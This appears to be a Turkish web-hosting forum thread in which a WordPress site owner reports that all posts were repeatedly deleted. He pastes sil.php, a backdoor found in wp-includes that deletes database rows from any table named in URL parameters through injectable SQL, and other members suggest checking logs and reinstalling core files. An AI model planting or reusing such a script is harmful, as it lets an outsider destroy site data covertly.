• 25-02-2021, 13:30:18
    #1
    daha önce forumdan birine site hızlandırma çalışması yaptırdım çalışmanın sahte bir çalışma olduğunu öğrenince şikayet konusu açıp para iadesi ve yapılan işlemlerin geri alınmasını istedim mod beni haklı buldu bende kişiye cpanel ve wp bilgilerimi 14 şubatta verdim kişi yaptığı işlemleri kaldırdı ancak sanırım sadece bununla kalmamış kötü amaçlı kodlar eklemiş siteye bunu daha sonradan farkettik.

    daha sonra forumdan @wordpress_rasim; 'e çalışma yaptırdık temiz iş çıkardı ancak çalışma bittikten sonra bir süre sonra sitedeki tüm gönderilerin silindiğini gördüm yedekleri yükledim ve rasim hocam tekrar gerekli ayarlamlrı yaptı bir süre sonra yine tüm gönderiler silindi sonra hacklendiğimi düşünüp wordfence ile tarattım daha sonra /wp-includes/blocks/block klasöründe sil.php adında bir dosya farkettim dosyanın içeriğini aşağıya bırakıyorum

    dosyayı incelediğimde 14 şubat günü yüklendiğini gördüm. bu dosyayı bahsi geçen kişinin yüklediğini nasıl kanıtlayabilirim?

    <?php
    try {
    $db = new PDO("mysql:host=localhost;dbname=xxxx_wp;charset=utf8", "kusdfxx_wp", "!E?i%sdsdaf!jY0G");
    } catch ( PDOException $e ){
         print $e->getMessage();
    }
    
    $tablo = $_GET['tablo'];
    $id = $_GET['id'];
    if($id!=""){
        $sorgu = "WHERE id='".$id."'";
    }
    $delete = $db->exec("DELETE FROM {$tablo} {$sorgu} ");
    print 'Toplam '.$delete.' 端ye silindi!';
    ?>
  • 25-02-2021, 13:32:35
    #2
    giris loglari olmasi lazim hocam
  • 25-02-2021, 13:33:31
    #3
    Beyfendi,
    Wordpress son sürümü indirin.
    Wp-admin
    wp-includes klasörlerini CPanel ya da hangi panelse silin.
    daha sonra indirdiğiniz wordpress sürümününün içinde yer alan wp-admin ve wp-includes i ftp'ye atınız.
    bu işlemi yaptıktan sonra söylemiş olduğunuz sıkıntı gidecektir.

    bu işlemlerin çoğalmasının ana sebebi w-rez tema/eklenti kullanmaktır. eğer lisanslı ise temanız bu işlemi yapmanız yeterlidir.
  • 25-02-2021, 13:34:10
    #4
    lisanslı hocam her şey
    chnyrdkl adlı üyeden alıntı: mesajı görüntüle
    Beyfendi,
    Wordpress son sürümü indirin.
    Wp-admin
    wp-includes klasörlerini CPanel ya da hangi panelse silin.
    daha sonra indirdiğiniz wordpress sürümününün içinde yer alan wp-admin ve wp-includes i ftp'ye atınız.
    bu işlemi yaptıktan sonra söylemiş olduğunuz sıkıntı gidecektir.

    bu işlemlerin çoğalmasının ana sebebi w-rez tema/eklenti kullanmaktır. eğer lisanslı ise temanız bu işlemi yapmanız yeterlidir.
  • 25-02-2021, 13:35:07
    #5
    karamazov adlı üyeden alıntı: mesajı görüntüle
    daha önce forumdan birine site hızlandırma çalışması yaptırdım çalışmanın sahte bir çalışma olduğunu öğrenince şikayet konusu açıp para iadesi ve yapılan işlemlerin geri alınmasını istedim mod beni haklı buldu bende kişiye cpanel ve wp bilgilerimi 14 şubatta verdim kişi yaptığı işlemleri kaldırdı ancak sanırım sadece bununla kalmamış kötü amaçlı kodlar eklemiş siteye bunu daha sonradan farkettik.

    daha sonra forumdan @wordpress_rasim; 'e çalışma yaptırdık temiz iş çıkardı ancak çalışma bittikten sonra bir süre sonra sitedeki tüm gönderilerin silindiğini gördüm yedekleri yükledim ve rasim hocam tekrar gerekli ayarlamlrı yaptı bir süre sonra yine tüm gönderiler silindi sonra hacklendiğimi düşünüp wordfence ile tarattım daha sonra /wp-includes/blocks/block klasöründe sil.php adında bir dosya farkettim dosyanın içeriğini aşağıya bırakıyorum

    dosyayı incelediğimde 14 şubat günü yüklendiğini gördüm. bu dosyayı bahsi geçen kişinin yüklediğini nasıl kanıtlayabilirim?

    <?php
    try {
    $db = new PDO("mysql:host=localhost;dbname=xxxx_wp;charset=utf8", "kusdfxx_wp", "!E?i%sdsdaf!jY0G");
    } catch ( PDOException $e ){
         print $e->getMessage();
    }
    
    $tablo = $_GET['tablo'];
    $id = $_GET['id'];
    if($id!=""){
        $sorgu = "WHERE id='".$id."'";
    }
    $delete = $db->exec("DELETE FROM {$tablo} {$sorgu} ");
    print 'Toplam '.$delete.' 端ye silindi!';
    ?>
    access.log dosyaları, onun dışında last komutu ile de sisteme girenlerin ip adresleri ve zamanlarını da temin edebilirsin hocam.
    Wordpress açıklı bir yazılım, sil.php olmasaydı kesinlikle başkası hackledi derdim ama söylediklerine göre şüpheli bir durum.
    Geçmiş olsun.
  • 25-02-2021, 13:36:35
    #6
    karamazov adlı üyeden alıntı: mesajı görüntüle
    lisanslı hocam her şey
    lisanslı ise, söylediklerimi yapmanız yeterlidir.ek olarak ftp'de ki ana dosyaları (wp-config.php) hariç onları da güncelleyin.
    bu işlemleri yaptıktan sonra ise, siteadi.com/wp-admin/upgrade yaparak veritabanı ile sürümü güncellemenize olanak sağlayacaktır.
  • 25-02-2021, 13:40:08
    #7
    Joddey adlı üyeden alıntı: mesajı görüntüle
    giris loglari olmasi lazim hocam
    Cpanelden access log olur.

    sil.php yi CTRL F ile aratın. O dosyayı hangi ip adresi hangi tarihte çalıştırdı hangi tarihte giriş yaptığı bellidir. Bununla birlikte savcılığa suç duyurusunda bulunun.
  • 25-02-2021, 13:41:31
    #8
    yani mantıken cpanel bilgilerine sahip olmayan biri db bilgilerini öğrenmesi çok zor değil mi ben bu yüzden şüphelendim tarih ve saatte çakışıyor.

    yalinyalniz adlı üyeden alıntı: mesajı görüntüle
    access.log dosyaları, onun dışında last komutu ile de sisteme girenlerin ip adresleri ve zamanlarını da temin edebilirsin hocam.
    Wordpress açıklı bir yazılım, sil.php olmasaydı kesinlikle başkası hackledi derdim ama söylediklerine göre şüpheli bir durum.
    Geçmiş olsun.
  • 25-02-2021, 13:47:20
    #9
    karamazov adlı üyeden alıntı: mesajı görüntüle
    yani mantıken cpanel bilgilerine sahip olmayan biri db bilgilerini öğrenmesi çok zor değil mi ben bu yüzden şüphelendim tarih ve saatte çakışıyor.


    Şikayetten kaçınmayın sakın. Bu sivri zekalı vatandaş foruma üye. Dava gününü iple çekiyorum...... Mevzu son bulsun avukatım ilgileniyor kuzenim bire bir. Forumdan ifşa da edeceğim.